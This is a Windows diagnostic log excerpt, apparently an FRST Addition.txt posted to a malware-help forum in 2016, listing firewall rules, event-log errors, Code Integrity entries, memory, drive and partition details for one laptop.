FirewallRules: [UDP Query User{20DA2450-7570-4E1E-9031-5816647CB0C0}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{469672CA-3068-496A-B6F3-6D056B3F94EC}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{C27863DD-DA18-4517-9A46-147356DC04A0}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{36CAA9A0-CF2F-41E3-9FFF-3450874D5C59}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{243172E8-4B5F-425F-BF04-B2B5F3E7A403}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{1D2DFD0E-D5EC-4752-92B8-E368E89284D6}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{0BADF6E7-E1A0-4CE7-94DA-DE08AEBF5D82}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [TCP Query User{6F9CFA5F-43B7-4F38-A2EB-33D24482AFE2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [UDP Query User{524D3047-F543-423C-BBA2-C1F85282F68F}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{13D475FB-EBA1-485F-B917-A220EB173BA6}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [{CB64B9E6-D340-4DA4-9DBC-3CE7972F23C2}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{CB94E3EA-4BB6-49CD-92DE-2A6D3626595D}] => (Allow) svchost.exe
FirewallRules: [{13481E17-AC7A-4230-9EE2-845150465099}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{26F76935-5395-4CFB-B3F1-97D86DCC8895}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{6A3B6260-5598-44EC-94C0-6CEC29EFFBB4}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [{CD1C20A4-B959-4729-931C-C3598550BCFE}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [TCP Query User{DD45F684-9FA9-4724-9211-05A5AC782004}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [UDP Query User{EA8B7F99-BCEF-40B7-A6E6-9255A47C8E05}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [{E125522E-6A95-43C3-A739-0A43B77932BE}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{FDECD1B7-A4CE-4897-A0A2-4C236EA4E1EB}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{B56AF803-58A6-420D-BD6F-7CA4894059E0}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
FirewallRules: [{66E515AA-3866-43D4-A43A-638A1633EE3E}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{118538F5-48A3-417E-B888-2E5CD50FFF8F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
==================== Restore Points =========================
05-04-2016 13:18:41 Scheduled Checkpoint
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (04/08/2016 10:09:18 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
Error: (04/08/2016 10:03:13 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
Error: (04/07/2016 06:10:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (04/07/2016 06:10:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (04/07/2016 05:35:50 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
Error: (04/07/2016 05:06:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x6f0
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
Error: (04/07/2016 04:30:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x142c
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
Error: (04/07/2016 03:58:21 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
Error: (04/07/2016 03:55:15 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
Error: (04/07/2016 03:53:18 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
System errors:
=============
Error: (04/08/2016 09:46:35 AM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/07/2016 06:10:24 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: App.AppXw3qcpc7p849541dp39vvqd01bn7z9ybh.mca
Error: (04/07/2016 06:10:23 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
CodeIntegrity:
===================================
Date: 2016-03-11 18:17:52.048
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 18:17:51.703
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 18:17:51.394
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 18:17:51.129
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 18:17:50.762
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 03:33:01.939
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 03:33:01.784
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 03:31:55.925
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 03:31:55.802
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-11 00:41:18.766
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Memory info ===========================
Processor: Intel® Core i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 45%
Total physical RAM: 3885.5 MB
Available physical RAM: 2102.95 MB
Total Virtual: 7853.5 MB
Available Virtual: 4729.97 MB
==================== Drives ================================
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.41 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
Edited by xXToffeeXx, 08 April 2016 - 12:05 PM.